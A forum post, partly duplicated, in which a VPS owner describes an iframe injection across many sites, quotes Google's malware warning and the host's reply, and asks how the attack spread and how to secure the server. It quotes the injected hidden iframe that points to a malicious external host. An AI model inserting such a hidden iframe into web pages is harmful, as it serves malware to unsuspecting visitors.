- Impact
- 2
Hi, I need help understanding the iframe injection attack and how it is performed by the hacker, and furthermore how it affects different accounts on my VPS - The reason I need to know is below:
I got an email from Google saying that they added one of my sites to their list of ‘bad ware sites’, the email was as follows:
This site did not contain spyware (that I knew of) so I did an audit by data modified via FTP to see if any files had been hacked, checking the recently modified files I discovered they did contain an iframe:
Do not visit the URL (as it contains a virus)
I removed that above code from one of my sites, then proceeded to check the others; all contain that above code or a similar code (different URL), all index.(xxxx) files have been inserted with the above JavaScript on affected accounts.
What I need to know is how did they get in? and how do I prevent this from happening again, because if I put these files back from backups - they will just be open to exploit again.
I contacted my host to ask how the hackers did it and how to prevent it from happening again, they said:
I am certain they don't have my password as I have roboform and never manually enter passwords or use my hosting passwords elsewhere, besides my hosting passwords are 'strong'. (but I will be changing them all incase)
So I suspect they may have inserted the code via a vulnerability in one of the scripts.
However if one script was vulnerable say for instance (vBulletin or phpbb) on one account/site on the VPS:
I really need help understanding this as I have a VPS with around 21 accounts (my sites), all using different passwords and scripts; I’m not host savvy at all.
Just removing this simple insertion into each index file is an enormous task due to the amount of accounts and index files, not to mention my visitors getting viruses
The only good thing that happened was Google informed me of the attack and very quickly (ie 1 day)
- The price to pay, Google labeling my sites as badware:td:.
I got an email from Google saying that they added one of my sites to their list of ‘bad ware sites’, the email was as follows:
Subject: Malware notification regarding *************.com
Date: 01/09/2009 19:07:08 GMT Daylight Time
From: [email protected]
Reply To:
To: abuse@*************.com, admin@*************.com, administrator@*************.com, contact@*************.com, info@*************.com, postmaster@*************.com, webmaster@*************.com
Sent from the Internet (Details)
Dear site owner or webmaster of *************.com,
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
http://************* .com/
http://www.************* .com/
Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http://*************.com/
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser
If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
StopBadware.org - Tips for Cleaning & Securing Your Website
Once you've secured your site, you can request that the warning be removed by visiting
My site's been hacked - Webmasters/Site owners Help
and requesting a review. If your site is no longer harmful to users, we will remove the warning.
Sincerely,
Google Search Quality Team
This site did not contain spyware (that I knew of) so I did an audit by data modified via FTP to see if any files had been hacked, checking the recently modified files I discovered they did contain an iframe:
Do not visit the URL (as it contains a virus)
<iframe src="http://u7n.ru:8080/index.php" width=177 height=158 style="visibility: hidden"></iframe>
I removed that above code from one of my sites, then proceeded to check the others; all contain that above code or a similar code (different URL), all index.(xxxx) files have been inserted with the above JavaScript on affected accounts.
What I need to know is how did they get in? and how do I prevent this from happening again, because if I put these files back from backups - they will just be open to exploit again.
I contacted my host to ask how the hackers did it and how to prevent it from happening again, they said:
We are sorry to hear that you are facing this problem. This kind of attack is known as iframe injection attack which only effects the index.xxx files. This is caused either due to weak FTP passwords or due to some vulnerability in the scripts. As you said the passwords are strong so the later one can be the cause in your case. Still I recommend you to reset all the passwords of the accounts and then audit them.
I am certain they don't have my password as I have roboform and never manually enter passwords or use my hosting passwords elsewhere, besides my hosting passwords are 'strong'. (but I will be changing them all incase)
So I suspect they may have inserted the code via a vulnerability in one of the scripts.
However if one script was vulnerable say for instance (vBulletin or phpbb) on one account/site on the VPS:
- Then how did they modify and insert code into other sites/accounts on the VPS that were not using the script?
- Why were some accounts not affected by the ‘iframe injection attack’?
- What is the best way to find out exactly where the vulnerability is and how the hacker did what they did?
- Any other security advice or ways to 'lockdown' a VPS?
I really need help understanding this as I have a VPS with around 21 accounts (my sites), all using different passwords and scripts; I’m not host savvy at all.
Just removing this simple insertion into each index file is an enormous task due to the amount of accounts and index files, not to mention my visitors getting viruses
The only good thing that happened was Google informed me of the attack and very quickly (ie 1 day)






